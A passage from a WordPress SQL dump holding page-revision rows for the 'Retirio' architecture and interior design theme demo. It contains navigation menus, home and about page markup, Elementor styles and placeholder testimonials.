action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>','Header 3','','inherit','closed','closed','','78-revision-v1','','','2022-06-07 07:25:33','2022-06-07 07:25:33','',78,'https://bauhaus.futuremediatrix.com/?p=4617',0,'revision','',0),(4618,1,'2022-06-07 09:06:59','2022-06-07 09:06:59','<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://demo.ovatheme.com/retirio/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner','','inherit','closed','closed','','169-revision-v1','','','2022-06-07 09:06:59','2022-06-07 09:06:59','',169,'https://bauhaus.futuremediatrix.com/?p=4618',0,'revision','',0),(4619,1,'2022-06-07 06:57:40','2022-06-07 06:57:40','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT INTERIOR</h3>\n														<h2>\n								We provide the best\narchitect & interior\ndesign services							</h2>\n		Our signature design process comes standard…refresh, remodel, new and enjoyable design experienceDuis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.		\n			<a href=\"https://demo.ovatheme.com/retirio/about/\" role=\"button\">\n						More Detail\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n	        				<h4>\n					Architecture				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n	        				<h4>\n					Interior work				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n	        				<h4>\n					Renovation				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n	        				<h4>\n					Decor &#038; art				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n		</a>\n		<p>Trust the experts for all your <strong style=\"color: #242424;\">architects &amp; interior needs.</strong></p>		\n			<a href=\"https://demo.ovatheme.com/retirio/services/\" role=\"button\">\n						More Service\n					</a>\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-home1.png 107w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://demo.ovatheme.com/retirio/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://demo.ovatheme.com/retirio/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://demo.ovatheme.com/retirio/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://demo.ovatheme.com/retirio/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://demo.ovatheme.com/retirio/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://demo.ovatheme.com/retirio/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://demo.ovatheme.com/retirio/is-architecture-a-good-career/\" rel=\"bookmark\" title=\"Is architecture a good career?\">\n								<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/blog-01.jpg\" alt=\" Is architecture a good career?\">\n							</a>\n									23\n									June\n										<a href=\"https://demo.ovatheme.com/retirio/is-architecture-a-good-career/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://demo.ovatheme.com/retirio/is-architecture-a-good-career/\" rel=\"bookmark\" title=\"Is architecture a good career?\">\n								Is architecture a good career?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2022-06-07 06:57:40','2022-06-07 06:57:40','',22,'https://bauhaus.futuremediatrix.com/?p=4619',0,'revision','',0),(4622,1,'2022-06-07 07:01:22','2022-06-07 07:01:22','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>Get to know us</h3>\n														<h2>\n								Most experienced architects & designers							</h2>\n		There are certain attributes of a profession and one has to catch hold of them in order to work efficiently and grow in that business. I share my experience as an interior designer, a profession of great esthetic value and charm.		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>Mike Hardson</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" 